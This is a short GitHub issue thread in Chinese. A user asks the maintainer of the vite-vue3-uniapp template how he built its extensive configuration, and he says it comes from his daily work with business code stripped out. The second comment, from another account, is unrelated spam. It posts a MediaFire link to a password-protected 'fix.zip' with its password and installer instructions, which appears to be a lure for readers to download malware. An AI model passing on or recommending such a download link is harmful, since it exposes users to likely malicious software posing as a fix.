### ISSUE TITLE
这么全的配置是怎么弄出来的？

### ISSUE THREAD

**Issue by Tindtily** [lincenying/vite-vue3-uniapp#2]
感谢作者提供的目标，一次运行成功。就是有个疑问，[官方的版本](https://gitee.com/dcloud/uni-preset-vue/)并没有提供这么复杂的配置，您是怎么找到的。

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lincenying** [comment]
官方的例子一般都是最基础的, 我这个是日常工作用的, 然后把业务代码去了, 所以功能会比较全

用到的依赖, 可以在package.json里看到, 然后在github上面搜索

**Comment by Tindtily** [comment]
好的，主要就是那些依赖太多了，很难想象如何把这些依赖弄完整。
